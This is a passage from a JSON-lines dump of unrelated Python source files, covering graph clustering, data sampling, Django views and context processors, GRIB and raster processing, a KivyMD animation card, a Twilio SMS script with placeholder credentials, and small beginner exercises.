self._compute_edges(self.sub_connection_matrix_)\n self.graph_ = self._compute_graph(data_frame.df, self.edges_, data_frame.dimensions)\n self.sub_graphs_ = self._compute_sub_graphs(self.graph_)\n\n self.graph_clustering_name_ = self._compute_graph_clustering(self.sub_graphs_, data_frame)\n return self\n\n def perform_sub_graph_clustering_preset_k(self, number_of_clusters, data_frame, nearest_neighbour_indices, border_points_order):\n self.preset_number_of_clusters = number_of_clusters\n self.nearest_neighbour_indices = nearest_neighbour_indices\n self.connection_matrix_ = self._compute_connection_matrix(nearest_neighbour_indices)\n self.edges_ = self._compute_edges(self.connection_matrix_)\n self.graph_ = self._compute_graph(data_frame.df, self.edges_, data_frame.dimensions)\n\n self.graph_ = self._reduce_to_fixed_k(data_frame.df, self.graph_, number_of_clusters, border_points_order)\n self.sub_graphs_ = self._compute_sub_graphs(self.graph_)\n self.graph_clustering_name_ = self._compute_graph_clustering(self.sub_graphs_, data_frame)\n return self\n\n @staticmethod\n def _compute_connection_matrix(nearest_neighbour_indices):\n point_count = nearest_neighbour_indices.shape[0]\n connection_matrix = np.zeros((point_count, point_count))\n for point_array in nearest_neighbour_indices:\n for point in point_array:\n connection_matrix[point_array[0]][point] = 1\n return connection_matrix\n\n @staticmethod\n def _compute_sub_connection_matrix(border_pts, connection_matrix):\n sub_connection_matrix = connection_matrix[:]\n for border_pt in border_pts:\n sub_connection_matrix[border_pt] = np.zeros(connection_matrix[border_pt].shape[0])\n return sub_connection_matrix\n\n @staticmethod\n def _compute_edges(sub_connection_matrix):\n edges = []\n for index, row in enumerate(sub_connection_matrix):\n for idx, point in enumerate(row):\n if point != 0:\n edges.append((index, idx))\n return edges\n\n @staticmethod\n def _compute_graph(df, edges, dimensions):\n g = nx.Graph()\n col_names = list(df.columns.values)[0:dimensions]\n for index, row in df.iterrows():\n col_dict = {}\n for i in range(0, dimensions):\n col_dict[\"a\"+str(i)] = row[col_names[i]]\n g.add_node(index, data=col_dict)\n g.add_edges_from(edges)\n return g\n\n @staticmethod\n def _compute_sub_graphs(graph):\n d = list(nx.connected_component_subgraphs(graph))\n return d\n\n @staticmethod\n def _compute_graph_clustering(sub_graphs, data_frame):\n\n clustering_name = \"graph_clustering \" + str(time.process_time())\n\n data_frame.add_result_name(clustering_name, -2, ColType.CLUSTER_LABEL)\n\n i = 1\n for sub_graph in sub_graphs:\n if len(sub_graph) > 1:\n for node in sub_graph.nodes:\n data_frame.add_result(clustering_name, node, i)\n i += 1\n else:\n for node in sub_graph.nodes:\n data_frame.add_result(clustering_name, node, -1)\n return clustering_name\n\n def _reduce_to_fixed_k(self, df, graph, fixed_number_of_clusters, border_points_order):\n\n sub_clusters = GraphClustering._compute_sub_graphs(graph)\n sub_clusters_without_noise = [x for x in sub_clusters if len(x) > 1]\n current_number_of_clusters = len(sub_clusters_without_noise)\n\n while current_number_of_clusters < fixed_number_of_clusters and len(border_points_order) > 0:\n\n to_remove = border_points_order.pop(0)\n edges_to_remove = [edge for edge in graph.edges if edge[0] == to_remove]\n graph.remove_edges_from(edges_to_remove)\n\n sub_clusters = GraphClustering._compute_sub_graphs(graph)\n sub_clusters_without_noise = [x for x in sub_clusters if len(x) > 1]\n current_number_of_clusters = len(sub_clusters_without_noise)\n\n self.edges_ = graph.edges\n return graph\n","sub_path":"Python Code/ba/GraphSearch.py","file_name":"GraphSearch.py","file_ext":"py","file_size_in_byte":5095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"467318660","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 27 14:03:58 2017\n\n@author: sherryluo\n\"\"\"\n\nimport numpy as np\n\nnum_samples = 50\nsample_size = 100\n\ndef create_samples(data_mat):\n\n def draw100(data_mat):\n # randomly draw 100 ratings with replacement\n test_ind = np.random.randint(0, high=data_mat.shape[0], size=sample_size)\n test = data_mat[test_ind]\n \n # the remained ratings serve as prior set\n prior_ind = range(data_mat.shape[0])\n prior_ind = np.setdiff1d(prior_ind, test_ind)\n prior = data_mat[prior_ind]\n return test, prior\n \n tests = []\n for i in range(num_samples):\n test, prior = draw100(data_mat)\n filename = 'prior{}.txt'.format(i)\n with open(filename, 'wb') as f:\n np.savetxt(f, prior.astype(int), fmt='%i', delimiter='\\t')\n tests.append(test)\n \n tests = np.vstack(tests)\n filename2 = 'tests.txt'\n with open(filename2, 'wb') as f2:\n np.savetxt(f2, tests.astype(int), fmt='%i', delimiter='\\t')\n\ndef main():\n datafile = 'ml-100k/u.data'\n u_data = np.loadtxt(datafile, dtype=int)\n u_data = u_data[:, :-1]\n create_samples(u_data)\n \nmain()","sub_path":"collaborative-filtering/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"357222787","text":"\"\"\"\nA set of request processors that return dictionaries to be merged into a\ntemplate context. Each function takes the request object as its only parameter\nand returns a dictionary to add to the context.\n\nThese are referenced from the setting TEMPLATE_CONTEXT_PROCESSORS and used by\nRequestContext.\n\"\"\"\nfrom settings import SEAFILE_VERSION, SITE_TITLE, SITE_NAME, SITE_BASE, \\\n ENABLE_SIGNUP, MAX_FILE_NAME\ntry:\n from settings import BUSINESS_MODE\nexcept ImportError:\n BUSINESS_MODE = False\n\ntry:\n from settings import ENABLE_FILE_SEARCH\nexcept ImportError:\n ENABLE_FILE_SEARCH = False\n\ndef base(request):\n \"\"\"\n Add seahub base configure to the context.\n \n \"\"\"\n try:\n org = request.user.org\n except AttributeError:\n org = None\n try:\n base_template = request.base_template\n except AttributeError:\n base_template = 'myhome_base.html'\n\n return {\n 'seafile_version': SEAFILE_VERSION,\n 'site_title': SITE_TITLE,\n 'business_mode': BUSINESS_MODE,\n 'cloud_mode': request.cloud_mode,\n 'org': org,\n 'base_template': base_template,\n 'site_name': SITE_NAME,\n 'enable_signup': ENABLE_SIGNUP,\n 'max_file_name': MAX_FILE_NAME,\n 'enable_file_search': ENABLE_FILE_SEARCH,\n }\n\n","sub_path":"base/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"642062645","text":"# def main():\n# numYearBase10 = 2011\n# numYearBase8 = 0o3733\n# numYearBase16 = 0x7DB\n\n# print(\"Year by base 10 : %d, by base 8 : %d, by base 16 : %d\" %(numYearBase10, numYearBase8, numYearBase16))\n\n# numComplex1 = complex(3,4)\n# numComplex2 = 4+3j\n\n# print(\"complex value : \", numComplex1)\n# print(\"Absolute value : \", abs(numComplex2))\n# print(\"Real value : \", numComplex2.real)\n# print(\"Image value : \", numComplex2.imag)\n\n# strDeptName = \"Industrial & Systems Engineering\"\n# strUnivName = \"KAIST\"\n# print(\"Department : \", strDeptName)\n# print(\"Full name or dept : \", (strDeptName+\", \"+strUnivName))\n\n# main()\n\ndef main():\n numTest1 = 10\n numTest2 = 3.0\n numPlus = numTest1 + numTest2\n numMinus = numTest1 - numTest2\n numMultiply = numTest1 * numTest2\n numDivide = numTest1 / numTest2\n numModulo = numTest1 % numTest2\n print(\"{0}, {1}, {2}, {3}, {4}\".format(numPlus, numMinus, numMultiply, numDivide, numModulo))\n \n numDivideInt = numTest1 / int(numTest2)\n print(numDivide, numDivideInt) # in python3 동일한 값이 출력됨\n # integer output을 얻기 위해서는 / 대신에 // 를 사용한다.\n\n numTest2, numTest1 = numTest1, numTest2 # swapping statement\n print(numTest1,numTest2)\n\n print(numTest1 == numTest2)\n print(numTest1 != numTest2)\n print(type(numTest1))\n\n numTest1 = str(numTest1)\n print(type(numTest1), numTest1)\n\n strformula = \"2011 / 7\"\n print(eval(strformula))\n\nmain()","sub_path":"실습/example1-4.py","file_name":"example1-4.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"251361445","text":"'''\nThis module provides classes to facilitate processing of GriB data using PyGrib\n\nJavier.Delgado@noaa.gov\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nimport pygrib\nimport logging as log\n\n\nDEFAULT_CONTOUR_LINE_PLOT_COLOR = 'black'\nDEFAULT_COLOR_MAP = plt.cm.jet\n\nclass GribMessage:\n ''' \n Very light-weight Encapsulation of a GriB message. Currently, it\n just stores it's name, lats, lons, and values. \n The PyGrib grib message is optionally stored as well. This is \n optional since it may take too much memory.\n The class provides methods for plotting the values onto an existing\n Basemap object as a contour or filled contour.\n '''\n def __init__(self, param_name, level, lats, lons, values, plotType, \n grib_message=None, **kwargs):\n self.param_name = param_name # should match parameterName attribute of grib file\n self.level = level\n self.lats = lats\n self.lons = lons\n self.values = values\n self.plot_type = plotType\n if grib_message != None:\n self.grib_message = grib_message\n\n def plot_contour_lines(self, basemap, colors=DEFAULT_CONTOUR_LINE_PLOT_COLOR):\n '''\n Make a contour plot from the GriB message's values onto the given \n Basemap object\n '''\n #small = np.min(self.values)\n #large = np.max(self.values)\n x,y = basemap(self.lons, self.lats)\n # use linspace arg to control how many bins to break the color map into\n #cs = map.contour(x, y, self.values, np.linspace(small,large,11), colors=colors )\n cs = basemap.contour(x, y, self.values, colors=colors ) \n plt.clabel(cs, inline=1, fontsize=10) # put values in contour lines\n\n def plot_contours(self, basemap):\n '''\n Make a filled contour plot from the grib message's values onto the\n given basemap object\n ''' \n x,y = basemap(self.lons, self.lats)\n rangeMin = np.min(self.values)\n rangeMax = np.max(self.values)\n #cs = m.contourf(x,y,self.values, np.linspace(rangeMax,rangeMin,11), cmap=plt.cm.jet )\n cs = basemap.contourf(x,y,self.values, cmap=DEFAULT_COLOR_MAP )\n cb = basemap.colorbar()\n \n","sub_path":"nwpy/dataproc/grib/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"346733411","text":"# Uses python3\nimport functools\nimport sys\n@functools.lru_cache(None)\ndef fib(n):\n if n<2:\n return n\n return fib(n-1) + fib(n-2)\nif __name__ == '__main__':\n #input = sys.stdin.read()\n n = int(input())\n m= (n+2) %60\n #print((fib(n+2)-1)%10)\n answer = fib(m)%10\n if answer == 0:\n print(answer)\n else:\n print(answer-1)\n #print((fib(m)%10)-1)\n","sub_path":"Algorithmic-ToolBox/week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"482352450","text":"import json\nimport re\n\n\ndef read_and_add():\n with open(\"input12.txt\") as f:\n values = f.read()\n r = re.compile(r\"-?\\d+\")\n numbers = r.findall(values)\n sum = 0\n for num in numbers:\n sum += int(num)\n return sum\n\n\ndef read_and_add2():\n with open(\"input12.txt\") as f:\n j = json.load(f)\n\n s = do_sum(j)\n print(s)\n\n\ndef do_sum(arg, ignore_red=False):\n sum_value = 0\n\n if type(arg) is str:\n sum_value += sum_string(arg)\n elif type(arg) is int:\n sum_value += arg\n elif type(arg) is list:\n sum_value += sum([do_sum(x) for x in arg])\n elif type(arg) is dict:\n if ignore_red and \"red\" in arg.values():\n return 0\n else:\n for k, v in arg.items():\n sum_value += do_sum(v)\n\n return sum_value\n\n\ndef sum_string(s):\n c = 0\n try:\n c = int(s)\n except ValueError:\n pass\n\n return c\n","sub_path":"2015/python/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"1525803","text":"# Create a Student class and initialize it with name and roll number. Make methods to :\n# 1. Display - It should display all informations of the student.\n# 2. setAge - It should assign age to student\n# 3. setMarks - It should assign marks to the student.\nfrom datetime import datetime\n\n\nclass Myclass:\n def __init__(self, firstname, lastname, birthday, roll_no):\n self.firstname = firstname\n self.lastname = lastname\n self.birthday = birthday\n self.roll_no = roll_no\n\n def studInfo(self):\n info = {\n \"Fullname\": self.firstname + \" \" + self.lastname,\n \"Birthday\": self.birthday,\n \"Roll Number\": self.roll_no,\n }\n return info\n\n def setAge(self):\n bday = self.birthday.split(\"-\")\n birth = datetime(int(bday[2]), int(bday[0]), int(bday[1]))\n total_days = datetime.today() - birth\n age_obj = str(total_days / 365).split(\" \")\n age = age_obj[0]\n return age + \" \" + \"y/o\"\n\n def setMarks(self, english, math, filipino):\n total = english + math + filipino\n total_mark = total / 3\n return f\"Grade : {total_mark:.1f}\"\n\n\n# x = Myclass('Sheriline', 'Malaca', '03-03-1998', '123421')\n\n# info = x.studInfo()\n# for i in info:\n# print(f'{i} : {info[i]}')\n\n# age = x.setAge()\n# print(f'Age : {age}')\n\n# marks = x.setMarks(80, 85, 89)\n# print(marks)\n\n# Output:\n# Fullname : Sheriline Malaca\n# Birthday : 03-03-1998\n# Roll Number : 123421\n# Age : 21 y/o\n# Grade : 84.7\n\n#######################################################################\n\n# class Derive(Myclass):\n# # print(Myclass('asasasa', 'asasa', '2-2-1997', '2131313'))\n# pass\n\n# print(Myclass('asasasa', 'asasa', '2-2-1997', '2131313').birthday) #2-2-1997\n","sub_path":"D9/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"388185650","text":"from twilio.rest import TwilioRestClient\n\naccount_sid = \"Avg900\" # Your Live Credentials Account SID from www.twilio.com/console\nauth_token = \"b567tht\" # Your Live Credentials Auth Token from www.twilio.com/console\n\nclient = TwilioRestClient(account_sid, auth_token)\n\nmessage = client.messages.create(\n body=\"Hello from python.\",\n to=\"verified_number\", # Replace with your phone number\n from_=\"twilio_number\") # Replace with your Twilio number\n\nprint(message.sid)\n","sub_path":"send_text.py","file_name":"send_text.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79922295","text":"# %load q01_outlier_removal/build.py\n# Default imports\nimport pandas as pd\nimport numpy as np\n\nloan_data = pd.read_csv('data/loan_prediction_uncleaned.csv')\nloan_data = loan_data.drop('Loan_ID', 1)\n\nloan_data\n\ndef outlier_removal(loan_data):\n loan_data1=loan_data.loc[:,['ApplicantIncome','CoapplicantIncome','LoanAmount']]\n loan_data1=loan_data1.dropna()\n loan_data2=loan_data1.sort_values(['ApplicantIncome','CoapplicantIncome','LoanAmount'])\n upper_quartile = np.percentile(loan_data2,95)\n h2=loan_data[loan_data2=': operator.ge,\n '>': operator.gt\n }\n operation = ops.get(op)\n return operation(arg1, arg2)\n\n\ndef create_mask(in_path, band, operator, threshold, write=True, out_dir=None,\n show_output=False,):\n \"\"\"Masking a raster with a given threshold and operatorself.\n\n Creates a a binary output raster in GTiff format. Keeps the input filename\n and adds the suffix '_mask'.\n\n Args:\n in_path (str): full path to input raster for rasterio.open().\n band (int): band number.\n operator (str): select one of '>', '>=', '<', '<=',\n '==', '!='.\n threshold (number): to define the split.\n write (bool): If True, write output to disk.\n out_dir (str): Output directory. If None, outputs will be written along\n input files.\n show_output (bool): If True, plotting the output mask.\n\n Returns:\n mask (ndarray): binary raster [0, 1].\n profile (rasterio profile): to reestablish geographic reference.\n\n Example:\n # files = os.listdir(in_dir)\n # for f in (f for f in files if f.lower().endswith('.tif')\n # create_mask(f, 2, '<', -17, write=True, out_dir='data\\\\output')\n\n TODO:\n * Transform is provided inside profile?\n \"\"\"\n with rio.open(in_path) as src:\n profile = src.profile\n\n try:\n arr = src.read(band)\n except IndexError:\n print(f'WARNING: band index of {in_path} not existing.'\n 'Will be skipped.')\n return None\n\n ras_mask = _cmp(arr, operator, threshold)\n\n if write:\n if out_dir:\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n _, fname = os.path.split(in_path)\n out_path = join(out_dir, fname[:-4] + '_mask.tif')\n else:\n out_path = in_path[:-4] + '_mask.tif'\n profile.update(\n dtype=rio.uint8,\n count=1,\n compress='lzw',\n nodata=None)\n with rio.open(out_path, 'w', **profile) as dst:\n dst.write(mask.astype(rio.uint8), 1)\n\n if show_output:\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 9))\n show(arr, ax=ax1, cmap='gray', vmin=-25, vmax=0, title='b1')\n show(mask, ax=ax2, cmap='gray', vmin=0, vmax=1, title='mask')\n plt.show()\n\n return ras_mask, profile\n\n\n# if __name__ == '__main__':\n\ngdal.UseExceptions()\n\nhome_dir = 'D:\\\\nw\\\\ws\\\\sarpy'\ndlm_dir = 'D:\\\\nw\\\\04_Geodaten\\\\Basis-DLM\\\\basis-dlm_EPSG25832_Shape'\nshp_path = join(dlm_dir, 'gew01_f.shp')\nshp = gpd.read_file(shp_path)\n\nras_path = join(home_dir, 'Intensity',\n 'Intensity_S1A_IW_SLC__1SDV_20180118T171647_'\n '20180118T171715_020212_0227CA_B637.tif')\nras_path = (\"D:\\\\nw\\\\ws\\\\sarpy\\\\data\\\\\"\n \"Intensity_S1B_IW_SLC__1SDV_20180105T172405_7EE6_clip.tif\")\n\n\n# extract the geometry in GeoJSON format\ngeoms = shp.geometry.values # list of shapely geometries\ngeometry = geoms[0] # shapely geometry\ngeoms = [mapping(geoms[0])]\n# extract the raster values values within the polygon\nwith rasterio.open(ras_path) as src:\n profile = src.profile\n transform = src.transform\n arr = src.read([1, 2, 1])\n\n # rio.plot.show(arr)\n\n # out_image, out_transform = mask(src, geoms, crop=True)\n\nstats = quicklook(ras_path)\n# print(stats)\n# print(arr.shape)\n# rio.plot.show(arr/-25, transform=transform)\n\n\n# shp = shp.to_crs(crs)\n#\n# plt.show()\n","sub_path":"sentools2/dev_sar.py","file_name":"dev_sar.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474769152","text":"\"\"\"\nComponents/User Animation Card\n==============================\n\nExample\n-------\n\n.. code-block:: python\n\n from kivymd.app import MDApp\n from kivy.lang import Builder\n from kivy.factory import Factory\n\n from kivymd.toast import toast\n from kivymd.theming import ThemeManager\n from kivymd.uix.useranimationcard import MDUserAnimationCard\n from kivymd.uix.button import MDIconButton\n from kivymd.uix.list import ILeftBodyTouch\n\n # Your content for a contact card.\n Builder.load_string('''\n #:import get_hex_from_color kivy.utils.get_hex_from_color\n\n\n \n orientation: 'vertical'\n padding: dp(10)\n spacing: dp(10)\n adaptive_height: True\n\n MDBoxLayout:\n adaptive_height: True\n\n Widget:\n MDRoundFlatButton:\n text: \"Free call\"\n Widget:\n MDRoundFlatButton:\n text: \"Free message\"\n Widget:\n\n OneLineIconListItem:\n text: \"Video call\"\n IconLeftSampleWidget:\n icon: 'camera-front-variant'\n\n TwoLineIconListItem:\n text: \"Call Viber Out\"\n secondary_text: \"[color=%s]Advantageous rates for calls[/color]\" % get_hex_from_color(app.theme_cls.primary_color)\n IconLeftSampleWidget:\n icon: 'phone'\n\n TwoLineIconListItem:\n text: \"Call over mobile network\"\n secondary_text: \"[color=%s]Operator's tariffs apply[/color]\" % get_hex_from_color(app.theme_cls.primary_color)\n IconLeftSampleWidget:\n icon: 'remote'\n ''')\n\n\n class IconLeftSampleWidget(ILeftBodyTouch, MDIconButton):\n pass\n\n\n class Example(MDApp):\n title = \"Example Animation Card\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.user_animation_card = None\n\n def build(self):\n def main_back_callback():\n toast('Close card')\n\n if not self.user_animation_card:\n self.user_animation_card = MDUserAnimationCard(\n user_name=\"Lion Lion\",\n path_to_avatar=\"./assets/african-lion-951778_1280.jpg\",\n callback=main_back_callback)\n self.user_animation_card.box_content.add_widget(\n Factory.TestAnimationCard())\n self.user_animation_card.open()\n\n\n Example().run()\n\"\"\"\n\n\nfrom kivy.animation import Animation\nfrom kivy.clock import Clock\nfrom kivy.core.window import Window\nfrom kivy.lang import Builder\nfrom kivy.metrics import dp, sp\nfrom kivy.properties import ListProperty, ObjectProperty, StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.modalview import ModalView\n\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.behaviors import SpecificBackgroundColorBehavior\nfrom kivymd.uix.button import MDIconButton\n\nBuilder.load_string(\n \"\"\"\n#:import Window kivy.core.window.Window\n#:import StiffScrollEffect kivymd.stiffscroll.StiffScrollEffect\n\n\n\n size_hint_y: None\n height: root.theme_cls.standard_increment\n padding: [root.theme_cls.horizontal_margins - dp(12), 0]\n\n BoxLayout:\n id: left_actions\n orientation: 'horizontal'\n size_hint_x: None\n padding: [0, (self.height - dp(48))/2]\n\n BoxLayout:\n padding: dp(12), 0\n\n MDLabel:\n font_style: 'H6'\n opposite_colors: root.opposite_colors\n theme_text_color: 'Custom'\n text_color: root.specific_text_color\n text: root.title\n shorten: True\n shorten_from: 'right'\n\n BoxLayout:\n id: right_actions\n orientation: 'horizontal'\n size_hint_x: None\n padding: [0, (self.height - dp(48))/2]\n\n\n\n canvas:\n Color:\n rgba:\n root.theme_cls.bg_dark \\\n if root.theme_cls.theme_style == 'Dark' \\\n else root.theme_cls.bg_light\n Rectangle:\n size: self.size\n pos: self.pos\n\n FitImage:\n id: image\n source: root.path_to_avatar\n size_hint: 1, None\n height: Window.height * 40 // 100\n y: Window.height - self.height\n allow_stretch: True\n keep_ratio: False\n\n canvas.after:\n Color:\n rgba: root._primary_color\n Rectangle:\n size: self.size\n pos: self.pos\n\n MDLabel:\n id: user_name\n font_style: 'H4'\n theme_text_color: 'Custom'\n color: 1, 1, 1, 1\n shorten: True\n shorten_from: 'right'\n text: root.user_name\n size_hint_y: None\n height: self.texture_size[1]\n\n ModifiedToolbar:\n id: toolbar\n md_bg_color: 0, 0, 0, 0\n left_action_items: [['arrow-left', lambda x: root._callback_back()]]\n y: Window.height - self.height\n\n ScrollView:\n id: scroll\n y: -image.height\n effect_cls: StiffScrollEffect\n scroll_distance: 100\n\n canvas.before:\n Color:\n rgba:\n root.theme_cls.bg_dark\n Rectangle:\n size: self.size\n pos: self.pos\n\n MDGridLayout:\n id: box_content\n adaptive_height: True\n cols: 1\n\n canvas:\n Color:\n rgba:\n root.theme_cls.bg_dark\n Rectangle:\n size: self.size\n pos: self.pos\n\"\"\"\n)\n\n\nclass MDUserAnimationCard(ThemableBehavior, ModalView):\n user_name = StringProperty()\n path_to_avatar = StringProperty()\n box_content = ObjectProperty()\n callback = ObjectProperty()\n _anim_bottom = True\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self._primary_color = self.theme_cls.primary_color\n self._primary_color[3] = 0\n self.user_animation_card = UserAnimationCard(\n user_name=self.user_name,\n path_to_avatar=self.path_to_avatar,\n _callback_back=self._callback_back,\n _primary_color=self._primary_color,\n )\n self.user_animation_card.ids.user_name.pos = (\n dp(15),\n Window.height - self.user_animation_card.ids.image.height,\n )\n self.box_content = self.user_animation_card.ids.box_content\n self.add_widget(self.user_animation_card)\n\n self._obj_avatar = self.user_animation_card.ids.image\n self._obj_user_name = self.user_animation_card.ids.user_name\n self._obj_toolbar = self.user_animation_card.ids.toolbar\n self._obj_scroll = self.user_animation_card.ids.scroll\n self._set_current_pos_objects()\n\n def _callback_back(self):\n self.dismiss()\n if self.callback:\n self.callback()\n\n def on_open(self):\n self._primary_color = self.theme_cls.primary_color\n self._primary_color[3] = 0\n self.user_animation_card._primary_color = self._primary_color\n\n def _set_current_pos_objects(self):\n self._avatar_y = self._obj_avatar.y\n self._toolbar_y = self._obj_toolbar.y\n self._user_name_y = self._obj_user_name.y\n self._scroll_y = self._obj_scroll.y\n\n def on_touch_move(self, touch):\n if touch.ud[\"swipe_begin\"] < touch.y:\n if self._anim_bottom:\n self._anim_bottom = False\n self.animation_to_top()\n else:\n if not self._anim_bottom:\n self._anim_bottom = True\n self.animation_to_bottom()\n\n def on_touch_down(self, touch):\n touch.ud[\"swipe_begin\"] = touch.y\n return super().on_touch_down(touch)\n\n def on_touch_up(self, touch):\n touch.ud[\"swipe_begin\"] = 0\n\n def animation_to_bottom(self):\n Animation(y=self._scroll_y, d=0.4, t=\"in_out_cubic\").start(\n self._obj_scroll\n )\n Animation(y=self._user_name_y, d=0.5, x=dp(15), t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(font_size=sp(36), d=0.3, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(_primary_color=[0, 0, 0, 0], d=0.3, t=\"in_out_cubic\").start(\n self.user_animation_card\n )\n Animation(y=self._avatar_y, d=0.4, t=\"in_out_cubic\").start(\n self._obj_avatar\n )\n\n def animation_to_top(self):\n user_name_y = (\n Window.height\n - self._obj_toolbar.height\n + (self.theme_cls.standard_increment // 2 - dp(12))\n )\n user_name_x = self.theme_cls.horizontal_margins + dp(12) * 5\n\n Animation(y=-self._obj_toolbar.height, d=0.4, t=\"in_out_cubic\").start(\n self._obj_scroll\n )\n Animation(y=user_name_y, d=0.3, x=user_name_x, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(font_size=sp(20), d=0.3, t=\"in_out_cubic\").start(\n self._obj_user_name\n )\n Animation(\n _primary_color=self.theme_cls.primary_color, d=0.3, t=\"in_out_cubic\"\n ).start(self.user_animation_card)\n Animation(y=self._obj_avatar.y + 30, d=0.4, t=\"in_out_cubic\").start(\n self._obj_avatar\n )\n\n\nclass UserAnimationCard(ThemableBehavior, FloatLayout):\n user_name = StringProperty()\n path_to_avatar = StringProperty()\n _callback_back = ObjectProperty()\n _primary_color = ListProperty()\n\n\nclass ModifiedToolbar(\n ThemableBehavior, SpecificBackgroundColorBehavior, BoxLayout\n):\n left_action_items = ListProperty()\n title = StringProperty()\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bind(specific_text_color=self.update_action_bar_text_colors)\n Clock.schedule_once(\n lambda x: self.on_left_action_items(0, self.left_action_items)\n )\n\n def on_left_action_items(self, instance, value):\n self.update_action_bar(self.ids[\"left_actions\"], value)\n\n def update_action_bar(self, action_bar, action_bar_items):\n action_bar.clear_widgets()\n new_width = 0\n for item in action_bar_items:\n new_width += dp(48)\n action_bar.add_widget(\n MDIconButton(\n icon=item[0],\n on_release=item[1],\n opposite_colors=True,\n text_color=self.specific_text_color,\n theme_text_color=\"Custom\",\n )\n )\n action_bar.width = new_width\n\n def update_action_bar_text_colors(self, instance, value):\n for child in self.ids[\"left_actions\"].children:\n child.text_color = self.specific_text_color\n","sub_path":"kivymd/uix/useranimationcard.py","file_name":"useranimationcard.py","file_ext":"py","file_size_in_byte":10876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626780877","text":"from django.contrib.auth.models import User, Group\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import authentication, permissions\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework.decorators import api_view\nfrom rest_framework.views import APIView\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse, HttpResponseRedirect\nfrom rest_framework.response import Response\nfrom django.contrib.auth import login as do_login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import logout\nfrom rest_framework.permissions import IsAuthenticated\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView\nfrom django.contrib import messages #import messages\nfrom .serializers import *\nfrom .models import *\nfrom django.db.models import F\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.views.decorators.http import require_http_methods\nfrom django.http import HttpResponse,HttpResponseBadRequest\nfrom django.core import serializers\nimport json\nfrom fcm_django.models import FCMDevice\n\n\n\n#from .serializers import UserSerializer, GroupSerializer,TCategoriaSerializer,TComentarioSerializer,TEscaneosSerializer,TFavoritoSerializer,TGaleriaSerializer,TLocalSerializer,TNotificacionesSerializer,TPermisoSerializer,TRolSerializer,TRolpermisoSerializer,TTelefonoSerializer,TUsuarioSerializer\n#from .models import Categoria,Comentario,Escaneos,Favorito,Galeria,Local,Notificaciones,Permiso,Rol,Rolpermiso,Telefono,User\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = User.objects.all().order_by('-date_joined')\n serializer_class = UserSerializer\n\n\nclass GroupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint that allows groups to be viewed or edited.\n \"\"\"\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n\nclass CategoriaViewSet(viewsets.ModelViewSet):\n queryset = Categoria.objects.all()\n serializer_class = TCategoriaSerializer\n\n\nclass ComentarioViewSet(viewsets.ModelViewSet):\n queryset = Comentario.objects.all()\n serializer_class = TComentarioSerializer\n\n\nclass EscaneosViewSet(viewsets.ModelViewSet):\n queryset = Escaneos.objects.all()\n serializer_class = TEscaneosSerializer\n\n\nclass FavoritoViewSet(viewsets.ModelViewSet):\n queryset = Favorito.objects.all()\n serializer_class = TFavoritoSerializer\n\n\nclass GaleriaViewSet(viewsets.ModelViewSet):\n queryset = Galeria.objects.all()\n serializer_class = TGaleriaSerializer\n\n\nclass LocalViewSet(viewsets.ModelViewSet):\n queryset = Local.objects.all()\n serializer_class = TLocalSerializer\n\n\nclass 